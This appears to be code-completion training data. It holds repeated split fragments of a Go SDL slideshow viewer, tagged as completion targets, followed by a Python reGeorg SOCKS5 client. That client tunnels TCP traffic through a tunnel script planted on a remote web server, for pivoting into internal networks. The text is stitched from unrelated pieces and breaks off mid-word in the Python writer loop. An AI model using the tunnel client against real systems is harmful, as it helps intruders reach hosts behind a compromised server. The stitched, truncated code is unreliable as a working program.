update = true
break
}
}
if !found {
if err := addPic(fileName); err != nil {
sdl.ShowSimpleMessageBox(sdl.MESSAGEBOX_INFORMATION, "File dropped on window", "Cannot add "+fileName, window.window)
} else {
slide.current = len(slide.list) - 1
update = true
}
}
/*case *sdl.MouseMotionEvent:
fmt.Printf("[%d ms] MouseMotion\ttype:%d\tid:%d\tx:%d\ty:%d\txrel:%d\tyrel:%d\n",
t.Timestamp, t.Type, t.Which, t.X, t.Y, t.XRel, t.YRel)
case *sdl.MouseButtonEvent:
fmt.Printf("[%d ms] MouseButton\ttype:%d\tid:%d\tx:%d\ty:%d\tbutton:%d\tstate:%d\n",
t.Timestamp, t.Type, t.Which, t.X, t.Y, t.Button, t.State)*/
case *sdl.WindowEvent:
if t.Event == sdl.WINDOWEVENT_RESIZED || t.Event == sdl.WINDOWEVENT_EXPOSED {
window.window.SetSize(t.Data1, t.Data2)
// Display information of the image
wWidth, wHeight := window.window.GetSize()
src = sdl.Rect{X: 0, Y: 0, W: curImg().W, H: curImg().H}
fitWidth, fitHeight := utils.ComputeFitImage(uint32(wWidth), uint32(wHeight), uint32(curImg().W), uint32(curImg().H))
dst = sdl.Rect{X: int32(wWidth/2 - int32(fitWidth)/2), Y: int32(wHeight/2 - int32(fitHeight)/2), W: int32(fitWidth), H: int32(fitHeight)}
window.renderer.Clear()
window.renderer.Copy(curImg().texture, &src, &dst)
window.renderer.Present()
if window.displayInfo {
window.displayPictureInfo()
window.renderer.Present()
}
}
case *sdl.KeyboardEvent:
if t.GetType() != sdl.KEYDOWN {
break
}
// Get next or previous image
if t.Repeat == 0 {
if t.Keysym.Sym == sdl.K_LEFT {
slide.current = utils.Mod((slide.current - 1), len(slide.list))
update = true
} else if t.Keysym.Sym == sdl.K_RIGHT {
slide.current = utils.Mod((slide.current + 1), len(slide.list))
update = true
} else if t.Keysym.Sym == sdl.K_PAGEUP {
if err := picture.RotateImage(curImg().path, picture.CounterClockwise); err != nil {
logger.Warning(err.Error())
} else {
resetImg(slide.current)
}
update = true
} else if t.Keysym.Sym == sdl.K_PAGEDOWN {
if err := picture.RotateImage(curImg().path, picture.Clockwise); err != nil {
logger.Warning(err.Error())
} else {
resetImg(slide.current)
}
update = true
} else if t.Keysym.Sym == 102 { // F
if window.fullscreen {
window.window.SetFullscreen(0)
} else {
// Go fullscreen
window.window.SetFullscreen(sdl.WINDOW_FULLSCREEN_DESKTOP)
}
window.fullscreen = !window.fullscreen
} else if t.Keysym.Sym == 105 { // I
window.displayInfo = !window.displayInfo
if window.displayInfo {
fmt.Println("Toggle info: on")
window.displayPictureInfo()
window.renderer.Present()
} else {
fmt.Println("Toggle info: off")
update = true
}
} else if t.Keysym.Sym == sdl.K_ESCAPE {
if window.fullscreen {
window.window.SetFullscreen(0)
window.fullscreen = false
}
} else {
fmt.Printf("%d\n", t.Keysym.Sym)
}
}
}
if update {
window.loadCurrentImage(true)
update = false
}
}
return 0
}
| MainLoop | identifier_name |
display.go | package core
//#include <stdlib.h>
import "C"
import (
"fmt"
"os"
"path/filepath"
"runtime"
"strconv"
"github.com/n0dev/go-slideshow/core/picture"
"github.com/n0dev/go-slideshow/core/picture/exif"
"github.com/n0dev/go-slideshow/logger"
"github.com/n0dev/go-slideshow/utils"
"github.com/veandco/go-sdl2/img"
"github.com/veandco/go-sdl2/sdl"
"github.com/veandco/go-sdl2/ttf"
)
const (
winTitle = "GoSlideshow"
winDefaultWidth = 600
winDefaultHeight = 800
)
var (
sdlColorWhite = sdl.Color{A: 0, B: 0, G: 0, R: 0}
sdlColorBlack = sdl.Color{A: 0, B: 255, G: 255, R: 255}
)
// Information about the display window
type winInfo struct {
window *sdl.Window
renderer *sdl.Renderer
font *ttf.Font
symbols *ttf.Font
fullscreen bool
displayInfo bool
}
type imgInfo struct {
path string
H int32
W int32
texture *sdl.Texture
}
// Change the title according to the inputs
func (win *winInfo) setTitle(position int, total int, path string) {
win.window.SetTitle(winTitle + " - " + strconv.Itoa(position) + "/" + strconv.Itoa(total) + " - " + filepath.Base(path))
}
// Create the texture from text using TTF
func (win *winInfo) renderText(text string) (*sdl.Texture, error) {
surface, err := win.font.RenderUTF8Shaded(text, sdlColorBlack, sdlColorWhite)
defer surface.Free()
if err != nil {
return nil, err
}
texture, err := win.renderer.CreateTextureFromSurface(surface)
if err != nil {
return nil, err
}
return texture, nil
}
// displayLoading display loading on background
func (win *winInfo) displayLoading() {
texture, _ := win.renderText("Loading...")
ww, wh := win.window.GetSize()
win.renderer.Copy(texture, nil, &sdl.Rect{X: int32(ww/2 - 50), Y: int32(wh/2 - 1), W: 65, H: 20})
texture.Destroy()
win.renderer.Present()
}
// displayPictureInfo display all information about the picture
func (win *winInfo) displayPictureInfo() {
/* Display exif information */
go func(path string) {
exif.Open(path)
}(curImg().path)
msg := filepath.Base(curImg().path)
texture, _ := win.renderText(msg)
width := int32(len(msg) * 8)
win.renderer.Copy(texture, nil, &sdl.Rect{X: 2, Y: 2, W: width, H: 20})
texture.Destroy()
}
func loadImg(win *winInfo, index int) {
if slide.list[index].texture == nil {
var err error
var surface *sdl.Surface
logger.Trace("load " + slide.list[index].path)
surface, err = img.Load(slide.list[index].path)
if err != nil {
fmt.Printf("Failed to load: %s\n", err)
}
defer surface.Free()
slide.list[index].H = surface.H
slide.list[index].W = surface.W
slide.list[index].texture, err = win.renderer.CreateTextureFromSurface(surface)
if err != nil {
fmt.Printf("Failed to create texture: %s\n", err)
}
}
}
func (win *winInfo) displayBar() {
message := "\uF04A \uF04B \uF04E \uF0E2 \uF01E"
surface, err := win.symbols.RenderUTF8Shaded(message, sdlColorWhite, sdlColorBlack)
if err == nil {
texture, err := win.renderer.CreateTextureFromSurface(surface)
if err != nil {
fmt.Println(err)
}
surface.Free()
width := int32(len(message) * 18)
win.renderer.Copy(texture, nil, &sdl.Rect{X: 120, Y: 500, W: width, H: 40})
texture.Destroy()
} else {
logger.Warning("OMG")
}
}
func resetImg(index int) {
if slide.list[index].texture != nil {
slide.list[index].texture.Destroy()
slide.list[index].texture = nil
}
}
func (win *winInfo) loadAndFreeAround() {
p1 := utils.Mod(slide.current-1, len(slide.list))
p2 := utils.Mod(slide.current-1, len(slide.list))
n1 := utils.Mod(slide.current+1, len(slide.list))
n2 := utils.Mod(slide.current+2, len(slide.list))
n3 := utils.Mod(slide.current+3, len(slide.list))
refresh := utils.IntList{p1, p2, n1, n2, n3}
// preload the previous and next two images
for _, idx := range refresh {
loadImg(win, idx)
}
d1 := utils.Mod(slide.current-3, len(slide.list))
d2 := utils.Mod(slide.current+3, len(slide.list))
if !refresh.Find(d1) {
resetImg(d1)
}
if !refresh.Find(d2) {
resetImg(d2)
}
}
func (win *winInfo) loadCurrentImage(render bool) {
var src, dst sdl.Rect
// load and display the current image
loadImg(win, slide.current)
// Display information of the image
ww, wh := win.window.GetSize()
src = sdl.Rect{X: 0, Y: 0, W: curImg().W, H: curImg().H}
iw, ih := utils.ComputeFitImage(uint32(ww), uint32(wh), uint32(curImg().W), uint32(curImg().H))
dst = sdl.Rect{X: int32(ww/2 - int32(iw)/2), Y: int32(wh/2 - int32(ih)/2), W: int32(iw), H: int32(ih)}
if render {
win.renderer.Clear()
win.renderer.Copy(curImg().texture, &src, &dst)
if window.displayInfo {
window.displayPictureInfo()
}
//window.displayBar()
win.renderer.Present()
}
// Update the window title
win.setTitle(slide.current+1, len(slide.list), curImg().path)
// Preload and free images from the list
win.loadAndFreeAround()
}
// Arrange that main.main runs on main thread.
func init() |
var window winInfo
// MainLoop initializes the SDL package and run the main loop
func MainLoop(fullScreen bool, slideshow bool) int {
var event sdl.Event
var src, dst sdl.Rect
var err error
var flags uint32 = sdl.WINDOW_SHOWN | sdl.WINDOW_RESIZABLE | sdl.WINDOW_ALLOW_HIGHDPI
// Load the font library
if err := ttf.Init(); err != nil {
logger.Warning("Unable to open font lib")
}
window.window, err = sdl.CreateWindow(winTitle, sdl.WINDOWPOS_UNDEFINED, sdl.WINDOWPOS_UNDEFINED, winDefaultHeight, winDefaultWidth, flags)
if err != nil {
fmt.Fprintf(os.Stderr, "Failed to create window: %s\n", err)
return 1
}
defer window.window.Destroy()
// Load resources
if f, err := filepath.Abs(filepath.Dir(os.Args[0])); err == nil {
icon := filepath.Join(f, "app", "icon.bmp")
if i, err := sdl.LoadBMP(icon); err == nil {
window.window.SetIcon(i)
}
font := filepath.Join(f, "app", "fonts", "opensans.ttf")
window.font, err = ttf.OpenFont(font, 14)
if err != nil {
logger.Warning("Unable to load " + font)
}
window.font.SetKerning(false)
font = filepath.Join(f, "app", "fonts", "fontawesome.ttf")
window.symbols, err = ttf.OpenFont(font, 64)
if err != nil {
logger.Warning("Unable to load " + font)
}
}
window.renderer, err = sdl.CreateRenderer(window.window, -1, sdl.RENDERER_ACCELERATED)
if err != nil {
fmt.Fprintf(os.Stderr, "Failed to create renderer: %s\n", err)
return 2
}
defer window.renderer.Destroy()
window.displayInfo = false
window.displayLoading()
window.setTitle(slide.current+1, len(slide.list), curImg().path)
window.loadCurrentImage(false)
// Declare if the image needs to be updated
var update = false
var running = true
for running {
event = sdl.WaitEvent()
switch t := event.(type) {
case *sdl.QuitEvent:
running = false
case *sdl.DropEvent:
fileName := t.File
// Check if picture already in list
found := false
for i := range slide.list {
if slide.list[i].path == fileName {
found = true
slide.current = i
update = true
break
}
}
if !found {
if err := addPic(fileName); err != nil {
sdl.ShowSimpleMessageBox(sdl.MESSAGEBOX_INFORMATION, "File dropped on window", "Cannot add "+fileName, window.window)
} else {
slide.current = len(slide.list) - 1
update = true
}
}
/*case *sdl.MouseMotionEvent:
fmt.Printf("[%d ms] MouseMotion\ttype:%d\tid:%d\tx:%d\ty:%d\txrel:%d\tyrel:%d\n",
t.Timestamp, t.Type, t.Which, t.X, t.Y, t.XRel, t.YRel)
case *sdl.MouseButtonEvent:
fmt.Printf("[%d ms] MouseButton\ttype:%d\tid:%d\tx:%d\ty:%d\tbutton:%d\tstate:%d\n",
t.Timestamp, t.Type, t.Which, t.X, t.Y, t.Button, t.State)*/
case *sdl.WindowEvent:
if t.Event == sdl.WINDOWEVENT_RESIZED || t.Event == sdl.WINDOWEVENT_EXPOSED {
window.window.SetSize(t.Data1, t.Data2)
// Display information of the image
wWidth, wHeight := window.window.GetSize()
src = sdl.Rect{X: 0, Y: 0, W: curImg().W, H: curImg().H}
fitWidth, fitHeight := utils.ComputeFitImage(uint32(wWidth), uint32(wHeight), uint32(curImg().W), uint32(curImg().H))
dst = sdl.Rect{X: int32(wWidth/2 - int32(fitWidth)/2), Y: int32(wHeight/2 - int32(fitHeight)/2), W: int32(fitWidth), H: int32(fitHeight)}
window.renderer.Clear()
window.renderer.Copy(curImg().texture, &src, &dst)
window.renderer.Present()
if window.displayInfo {
window.displayPictureInfo()
window.renderer.Present()
}
}
case *sdl.KeyboardEvent:
if t.GetType() != sdl.KEYDOWN {
break
}
// Get next or previous image
if t.Repeat == 0 {
if t.Keysym.Sym == sdl.K_LEFT {
slide.current = utils.Mod((slide.current - 1), len(slide.list))
update = true
} else if t.Keysym.Sym == sdl.K_RIGHT {
slide.current = utils.Mod((slide.current + 1), len(slide.list))
update = true
} else if t.Keysym.Sym == sdl.K_PAGEUP {
if err := picture.RotateImage(curImg().path, picture.CounterClockwise); err != nil {
logger.Warning(err.Error())
} else {
resetImg(slide.current)
}
update = true
} else if t.Keysym.Sym == sdl.K_PAGEDOWN {
if err := picture.RotateImage(curImg().path, picture.Clockwise); err != nil {
logger.Warning(err.Error())
} else {
resetImg(slide.current)
}
update = true
} else if t.Keysym.Sym == 102 { // F
if window.fullscreen {
window.window.SetFullscreen(0)
} else {
// Go fullscreen
window.window.SetFullscreen(sdl.WINDOW_FULLSCREEN_DESKTOP)
}
window.fullscreen = !window.fullscreen
} else if t.Keysym.Sym == 105 { // I
window.displayInfo = !window.displayInfo
if window.displayInfo {
fmt.Println("Toggle info: on")
window.displayPictureInfo()
window.renderer.Present()
} else {
fmt.Println("Toggle info: off")
update = true
}
} else if t.Keysym.Sym == sdl.K_ESCAPE {
if window.fullscreen {
window.window.SetFullscreen(0)
window.fullscreen = false
}
} else {
fmt.Printf("%d\n", t.Keysym.Sym)
}
}
}
if update {
window.loadCurrentImage(true)
update = false
}
}
return 0
}
| {
runtime.LockOSThread()
// Video only
if err := sdl.Init(sdl.INIT_VIDEO); err != nil {
logger.Warning(err.Error())
}
} | identifier_body |
display.go | package core
//#include <stdlib.h>
import "C"
import (
"fmt"
"os"
"path/filepath"
"runtime"
"strconv"
"github.com/n0dev/go-slideshow/core/picture"
"github.com/n0dev/go-slideshow/core/picture/exif"
"github.com/n0dev/go-slideshow/logger"
"github.com/n0dev/go-slideshow/utils"
"github.com/veandco/go-sdl2/img"
"github.com/veandco/go-sdl2/sdl"
"github.com/veandco/go-sdl2/ttf"
)
const (
winTitle = "GoSlideshow"
winDefaultWidth = 600
winDefaultHeight = 800
)
var (
sdlColorWhite = sdl.Color{A: 0, B: 0, G: 0, R: 0}
sdlColorBlack = sdl.Color{A: 0, B: 255, G: 255, R: 255}
)
// Information about the display window
type winInfo struct {
window *sdl.Window
renderer *sdl.Renderer
font *ttf.Font
symbols *ttf.Font
fullscreen bool
displayInfo bool
}
type imgInfo struct {
path string
H int32
W int32
texture *sdl.Texture
}
// Change the title according to the inputs
func (win *winInfo) setTitle(position int, total int, path string) {
win.window.SetTitle(winTitle + " - " + strconv.Itoa(position) + "/" + strconv.Itoa(total) + " - " + filepath.Base(path))
}
// Create the texture from text using TTF
func (win *winInfo) renderText(text string) (*sdl.Texture, error) {
surface, err := win.font.RenderUTF8Shaded(text, sdlColorBlack, sdlColorWhite)
defer surface.Free()
if err != nil {
return nil, err
}
texture, err := win.renderer.CreateTextureFromSurface(surface)
if err != nil {
return nil, err
}
return texture, nil
}
// displayLoading display loading on background
func (win *winInfo) displayLoading() {
texture, _ := win.renderText("Loading...")
ww, wh := win.window.GetSize()
win.renderer.Copy(texture, nil, &sdl.Rect{X: int32(ww/2 - 50), Y: int32(wh/2 - 1), W: 65, H: 20})
texture.Destroy()
win.renderer.Present()
}
// displayPictureInfo display all information about the picture
func (win *winInfo) displayPictureInfo() {
/* Display exif information */
go func(path string) {
exif.Open(path)
}(curImg().path)
msg := filepath.Base(curImg().path)
texture, _ := win.renderText(msg)
width := int32(len(msg) * 8)
win.renderer.Copy(texture, nil, &sdl.Rect{X: 2, Y: 2, W: width, H: 20})
texture.Destroy()
}
func loadImg(win *winInfo, index int) {
if slide.list[index].texture == nil {
var err error
var surface *sdl.Surface
logger.Trace("load " + slide.list[index].path)
surface, err = img.Load(slide.list[index].path)
if err != nil {
fmt.Printf("Failed to load: %s\n", err)
}
defer surface.Free()
slide.list[index].H = surface.H
slide.list[index].W = surface.W
slide.list[index].texture, err = win.renderer.CreateTextureFromSurface(surface)
if err != nil {
fmt.Printf("Failed to create texture: %s\n", err)
}
}
}
func (win *winInfo) displayBar() {
message := "\uF04A \uF04B \uF04E \uF0E2 \uF01E"
surface, err := win.symbols.RenderUTF8Shaded(message, sdlColorWhite, sdlColorBlack)
if err == nil {
texture, err := win.renderer.CreateTextureFromSurface(surface)
if err != nil {
fmt.Println(err)
}
surface.Free()
width := int32(len(message) * 18)
win.renderer.Copy(texture, nil, &sdl.Rect{X: 120, Y: 500, W: width, H: 40})
texture.Destroy()
} else {
logger.Warning("OMG")
}
}
func resetImg(index int) {
if slide.list[index].texture != nil {
slide.list[index].texture.Destroy()
slide.list[index].texture = nil
}
}
func (win *winInfo) loadAndFreeAround() {
p1 := utils.Mod(slide.current-1, len(slide.list))
p2 := utils.Mod(slide.current-1, len(slide.list))
n1 := utils.Mod(slide.current+1, len(slide.list))
n2 := utils.Mod(slide.current+2, len(slide.list))
n3 := utils.Mod(slide.current+3, len(slide.list))
refresh := utils.IntList{p1, p2, n1, n2, n3}
// preload the previous and next two images
for _, idx := range refresh {
loadImg(win, idx)
}
d1 := utils.Mod(slide.current-3, len(slide.list))
d2 := utils.Mod(slide.current+3, len(slide.list))
if !refresh.Find(d1) {
resetImg(d1)
}
if !refresh.Find(d2) {
resetImg(d2)
}
}
func (win *winInfo) loadCurrentImage(render bool) {
var src, dst sdl.Rect
// load and display the current image
loadImg(win, slide.current)
// Display information of the image
ww, wh := win.window.GetSize()
src = sdl.Rect{X: 0, Y: 0, W: curImg().W, H: curImg().H}
iw, ih := utils.ComputeFitImage(uint32(ww), uint32(wh), uint32(curImg().W), uint32(curImg().H))
dst = sdl.Rect{X: int32(ww/2 - int32(iw)/2), Y: int32(wh/2 - int32(ih)/2), W: int32(iw), H: int32(ih)}
if render {
win.renderer.Clear()
win.renderer.Copy(curImg().texture, &src, &dst)
if window.displayInfo {
window.displayPictureInfo()
}
//window.displayBar()
win.renderer.Present()
}
// Update the window title
win.setTitle(slide.current+1, len(slide.list), curImg().path)
// Preload and free images from the list
win.loadAndFreeAround()
}
// Arrange that main.main runs on main thread.
func init() {
runtime.LockOSThread()
// Video only
if err := sdl.Init(sdl.INIT_VIDEO); err != nil {
logger.Warning(err.Error())
}
}
var window winInfo
// MainLoop initializes the SDL package and run the main loop
func MainLoop(fullScreen bool, slideshow bool) int {
var event sdl.Event
var src, dst sdl.Rect
var err error
var flags uint32 = sdl.WINDOW_SHOWN | sdl.WINDOW_RESIZABLE | sdl.WINDOW_ALLOW_HIGHDPI
// Load the font library
if err := ttf.Init(); err != nil {
logger.Warning("Unable to open font lib")
}
window.window, err = sdl.CreateWindow(winTitle, sdl.WINDOWPOS_UNDEFINED, sdl.WINDOWPOS_UNDEFINED, winDefaultHeight, winDefaultWidth, flags)
if err != nil {
fmt.Fprintf(os.Stderr, "Failed to create window: %s\n", err)
return 1
}
defer window.window.Destroy()
// Load resources
if f, err := filepath.Abs(filepath.Dir(os.Args[0])); err == nil {
icon := filepath.Join(f, "app", "icon.bmp")
if i, err := sdl.LoadBMP(icon); err == nil {
window.window.SetIcon(i)
}
font := filepath.Join(f, "app", "fonts", "opensans.ttf")
window.font, err = ttf.OpenFont(font, 14)
if err != nil {
logger.Warning("Unable to load " + font)
}
window.font.SetKerning(false)
font = filepath.Join(f, "app", "fonts", "fontawesome.ttf")
window.symbols, err = ttf.OpenFont(font, 64)
if err != nil {
logger.Warning("Unable to load " + font)
}
}
window.renderer, err = sdl.CreateRenderer(window.window, -1, sdl.RENDERER_ACCELERATED)
if err != nil {
fmt.Fprintf(os.Stderr, "Failed to create renderer: %s\n", err)
return 2
}
defer window.renderer.Destroy()
window.displayInfo = false
window.displayLoading()
window.setTitle(slide.current+1, len(slide.list), curImg().path)
window.loadCurrentImage(false)
// Declare if the image needs to be updated
var update = false
var running = true
for running {
event = sdl.WaitEvent()
switch t := event.(type) {
case *sdl.QuitEvent:
running = false
case *sdl.DropEvent:
fileName := t.File
// Check if picture already in list
found := false
for i := range slide.list {
if slide.list[i].path == fileName {
found = true
slide.current = i
update = true
break
}
}
if !found {
if err := addPic(fileName); err != nil {
sdl.ShowSimpleMessageBox(sdl.MESSAGEBOX_INFORMATION, "File dropped on window", "Cannot add "+fileName, window.window)
} else {
slide.current = len(slide.list) - 1
update = true
}
}
/*case *sdl.MouseMotionEvent:
fmt.Printf("[%d ms] MouseMotion\ttype:%d\tid:%d\tx:%d\ty:%d\txrel:%d\tyrel:%d\n",
t.Timestamp, t.Type, t.Which, t.X, t.Y, t.XRel, t.YRel)
case *sdl.MouseButtonEvent:
fmt.Printf("[%d ms] MouseButton\ttype:%d\tid:%d\tx:%d\ty:%d\tbutton:%d\tstate:%d\n",
t.Timestamp, t.Type, t.Which, t.X, t.Y, t.Button, t.State)*/
case *sdl.WindowEvent:
if t.Event == sdl.WINDOWEVENT_RESIZED || t.Event == sdl.WINDOWEVENT_EXPOSED {
window.window.SetSize(t.Data1, t.Data2)
// Display information of the image
wWidth, wHeight := window.window.GetSize()
src = sdl.Rect{X: 0, Y: 0, W: curImg().W, H: curImg().H}
fitWidth, fitHeight := utils.ComputeFitImage(uint32(wWidth), uint32(wHeight), uint32(curImg().W), uint32(curImg().H))
dst = sdl.Rect{X: int32(wWidth/2 - int32(fitWidth)/2), Y: int32(wHeight/2 - int32(fitHeight)/2), W: int32(fitWidth), H: int32(fitHeight)}
window.renderer.Clear()
window.renderer.Copy(curImg().texture, &src, &dst)
window.renderer.Present()
if window.displayInfo {
window.displayPictureInfo()
window.renderer.Present()
}
}
case *sdl.KeyboardEvent:
if t.GetType() != sdl.KEYDOWN {
break
}
// Get next or previous image
if t.Repeat == 0 {
if t.Keysym.Sym == sdl.K_LEFT {
slide.current = utils.Mod((slide.current - 1), len(slide.list))
update = true
} else if t.Keysym.Sym == sdl.K_RIGHT {
slide.current = utils.Mod((slide.current + 1), len(slide.list))
update = true
} else if t.Keysym.Sym == sdl.K_PAGEUP {
if err := picture.RotateImage(curImg().path, picture.CounterClockwise); err != nil {
logger.Warning(err.Error())
} else {
resetImg(slide.current)
}
update = true
} else if t.Keysym.Sym == sdl.K_PAGEDOWN {
if err := picture.RotateImage(curImg().path, picture.Clockwise); err != nil {
logger.Warning(err.Error())
} else {
resetImg(slide.current)
}
update = true
} else if t.Keysym.Sym == 102 { // F
if window.fullscreen {
window.window.SetFullscreen(0)
} else {
// Go fullscreen
window.window.SetFullscreen(sdl.WINDOW_FULLSCREEN_DESKTOP)
}
window.fullscreen = !window.fullscreen
} else if t.Keysym.Sym == 105 { // I
window.displayInfo = !window.displayInfo
if window.displayInfo {
fmt.Println("Toggle info: on")
window.displayPictureInfo()
window.renderer.Present()
} else {
fmt.Println("Toggle info: off")
update = true
}
} else if t.Keysym.Sym == sdl.K_ESCAPE {
if window.fullscreen |
} else {
fmt.Printf("%d\n", t.Keysym.Sym)
}
}
}
if update {
window.loadCurrentImage(true)
update = false
}
}
return 0
}
| {
window.window.SetFullscreen(0)
window.fullscreen = false
} | conditional_block |
w_reGeorgSocksProxy.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from traceback import format_exc
import time
import argparse
from urlparse import urlparse
from socket import *
from threading import Thread
import requests
from handle_log import logger
# Constants
SOCKTIMEOUT = 5
RESENDTIMEOUT = 300
VER = "\x05"
METHOD = "\x00"
SUCCESS = "\x00"
SOCKFAIL = "\x01"
NETWORKFAIL = "\x02"
HOSTFAIL = "\x04"
REFUSED = "\x05"
TTLEXPIRED = "\x06"
UNSUPPORTCMD = "\x07"
ADDRTYPEUNSPPORT = "\x08"
UNASSIGNED = "\x09"
BASICCHECKSTRING = "Georg says, 'All seems fine'"
# Globals
READBUFSIZE = 1024
HEADER = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
}
TIMEOUT = (5, 5)
class SocksCmdNotImplemented(Exception):
pass
class SocksProtocolNotImplemented(Exception):
pass
class RemoteConnectionFailed(Exception):
pass
class session(Thread):
def __init__(self, pSocket, connectString):
Thread.__init__(self)
self.pSocket = pSocket
self.connectString = connectString
o = urlparse(connectString)
try:
self.httpPort = o.port
except:
if o.scheme == "https":
self.httpPort = 443
else:
self.httpPort = 80
else:
if not o.port:
if o.scheme == "https":
self.httpPort = 443
else:
self.httpPort = 80
self.httpScheme = o.scheme
self.httpHost = o.netloc.split(":")[0]
self.httpPath = o.path
self.cookie = None
def parseSocks5(self, sock):
logger.debug("SocksVersion5 detected")
# 02:00
nmethods, methods = (sock.recv(1), sock.recv(1))
# 05:00
sock.sendall(VER + METHOD)
# :02
ver = sock.recv(1)
if ver == "\x02": # this is a hack for proxychains
# 05:01:00:01----:c0:a8:01:02:00:50
# '\x05', '\x01', '\x00', '\x01'
ver, cmd, rsv, atyp = (sock.recv(1), sock.recv(1), sock.recv(1), sock.recv(1))
else:
cmd, rsv, atyp = (sock.recv(1), sock.recv(1), sock.recv(1))
target = None
targetPort = None
if atyp == "\x01": # IPv4
# Reading 6 bytes for the IP and Port
# c0:a8:01:02
target = sock.recv(4)
# 00:50
targetPort = sock.recv(2)
# 目标地址192.168.2.1
self.target = ".".join([str(ord(i)) for i in target])
elif atyp == "\x03": # Hostname
targetLen = ord(sock.recv(1)) # hostname length (1 byte)
target = sock.recv(targetLen)
targetPort = sock.recv(2)
target = "".join([unichr(ord(i)) for i in target])
elif atyp == "\x04": # IPv6
target = sock.recv(16)
targetPort = sock.recv(2)
tmp_addr = []
for i in xrange(len(target) / 2):
tmp_addr.append(unichr(ord(target[2 * i]) * 256 + ord(target[2 * i + 1])))
target = ":".join(tmp_addr)
# 80
self.targetPort = ord(targetPort[0]) * 256 + ord(targetPort[1])
if cmd == "\x02": # BIND
raise SocksCmdNotImplemented("Socks5 - BIND not implemented")
elif cmd == "\x03": # UDP
raise SocksCmdNotImplemented("Socks5 - UDP not implemented")
elif cmd == "\x01": # CONNECT
serverIp = target
try:
serverIp = gethostbyname(self.target)
except:
logger.error("oeps")
# 又转回来\xc0\xa8\x02\x01
serverIp = "".join([chr(int(i)) for i in serverIp.split(".")])
# 获取cookie,在服务端的脚本中,会执行相应端口探测
self.cookie = self.setupRemoteSession(target=self.target, targetPort=str(self.targetPort))
if self.cookie:
sock.sendall(VER + SUCCESS + "\x00" + "\x01" + serverIp + chr(self.targetPort / 256) + chr(
self.targetPort % 256))
return True
else:
sock.sendall(VER + REFUSED + "\x00" + "\x01" + serverIp + chr(self.targetPort / 256) + chr(
self.targetPort % 256))
return False
def handleSocks(self, sock):
# 通过proxychain模拟客户端发送数据,第一个字节可以判断是socks5还是socks4
ver = sock.recv(1)
# 05:02:00:02
if ver == "\x05":
return self.parseSocks5(sock)
def setupRemoteSession(self, target, targetPort):
"""探测端口存活"""
header = ({"X-CMD": "CONNECT", "X-TARGET": target, "X-PORT": targetPort})
cookie = None
try:
response = requests.post(url=self.connectString, headers=header, data=None, timeout=TIMEOUT)
except Exception, e:
return
else:
if response:
response_header = response.headers
if response.status_code == 200 and response_header.get("X-STATUS") == "OK":
cookie = response_header.get("Set-Cookie")
logger.info("[%s:%s] HTTP [200]: cookie [%s]" % (target, targetPort, cookie))
elif response_header.get("X-ERROR"):
logger.error(response_header.get("X-ERROR"))
else:
logger.error("[%s:%s] HTTP [%d]" % (target, targetPort, response.status_code))
return cookie
def closeRemoteSession(self):
header = {"X-CMD": "DISCONNECT", "Cookie": self.cookie}
try:
response = requests.post(url=self.connectString, headers=header, data=None, timeout=TIMEOUT)
except Exception, e:
logger.error("Close Connection Failure")
else:
if response.status_code == 200:
logger.info("[%s:%d] Connection Terminated" % (self.httpHost, self.httpPort))
def reader(self):
while True:
try:
if not self.pSocket:
break
header = {"X-CMD": "READ", "Cookie": self.cookie, "Connection": "Keep-Alive"}
response = requests.post(url=self.connectString, headers=header, data=None)
response_data = None
if response.status_code == 200:
response_header = response.headers
status = response_header.get("x-status")
if status == "OK":
response_data = response.content
else:
logger.error("[%s:%d] HTTP [%d]: Status: [%s]: Message [%s] Shutting down" % (
self.target, self.targetPort, response.status_code, status, response_header.get("X-ERROR")))
else:
logger.error(
"[%s:%d] HTTP [%d]: Shutting down" % (self.target, self.targetPort, response.status_code))
if response_data is None:
# Remote socket closed
break
if len(response_data) == 0:
time.sleep(0.1)
continue
self.pSocket.send(response_data)
except Exception, ex:
print(format_exc())
raise ex
self.closeRemoteSession()
logger.debug("[%s:%d] Closing localsocket" % (self.target, self.targetPort))
try:
self.pSocket.close()
except:
logger.debug("[%s:%d] Localsocket already closed" % (self.target, self.targetPort))
def writer(self):
global READBUFSIZE
while True:
try:
self.pSocket.settimeou | # 'GET / HTTP/1.1\r\nHost: 192.168.2.1\r\nUser-Agent: curl/7.58.0\r\nAccept: */*\r\n\r\n'
data = self.pSocket.recv(READBUFSIZE)
if not data:
break
header = {"X-CMD": "FORWARD", "Cookie": self.cookie, "Content-Type": "application/octet-stream",
"Connection": "Keep-Alive"}
# 携带数据
response = requests.post(url=self.connectString, headers=header, data=data)
if response.status_code == 200:
response_header = response.headers
status = response_header.get("x-status")
if status == "OK":
if response_header.get("set-cookie") is not None:
self.cookie = response_header.get("set-cookie")
else:
logger.error("[%s:%d] HTTP [%d]: Status: [%s]: Message [%s] Shutting down" % (
self.target, self.targetPort, response.status_code, status, response_header.get("x-error")))
break
else:
logger.error(
"[%s:%d] HTTP [%d]: Shutting down" % (self.target, self.targetPort, response.status_code))
break
# transferLog.info("[%s:%d] >>>> [%d]" % (self.target, self.port, len(data)))
except timeout:
continue
except Exception, ex:
raise ex
self.closeRemoteSession()
logger.debug("Closing localsocket")
try:
self.pSocket.close()
except:
logger.debug("Localsocket already closed")
def run(self):
try:
if self.handleSocks(self.pSocket):
r = Thread(target=self.reader, args=())
r.start()
w = Thread(target=self.writer, args=())
w.start()
w.join()
r.join()
except Exception, e:
# 报错关闭连接
logger.error(format_exc())
self.closeRemoteSession()
self.pSocket.close()
def askgeorg(url):
"""检测reg连接方法"""
try:
response = requests.get(url=url, headers=HEADER, timeout=TIMEOUT)
except Exception, e:
return False
else:
if response:
text = response.text.strip()
if response.status_code == 200 and text == "Georg says, 'All seems fine'":
logger.info(text)
return True
else:
return False
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Socks server for reGeorg HTTP(s) tunneller')
parser.add_argument("-l", "--listen-on", metavar="", help="The default listening address", default="127.0.0.1")
parser.add_argument("-p", "--listen-port", metavar="", help="The default listening port", type=int, default="8888")
parser.add_argument("-r", "--read-buff", metavar="", help="Local read buffer, max data to be sent per POST",
type=int, default="1024")
parser.add_argument("-u", "--url", metavar="", required=True, help="The url containing the tunnel script")
# 取消了原通过命令行指定log级别,通过配置文件指定
# parser.add_argument("-v", "--verbose", metavar="", help="Verbose output[INFO|DEBUG]", default="INFO")
args = parser.parse_args()
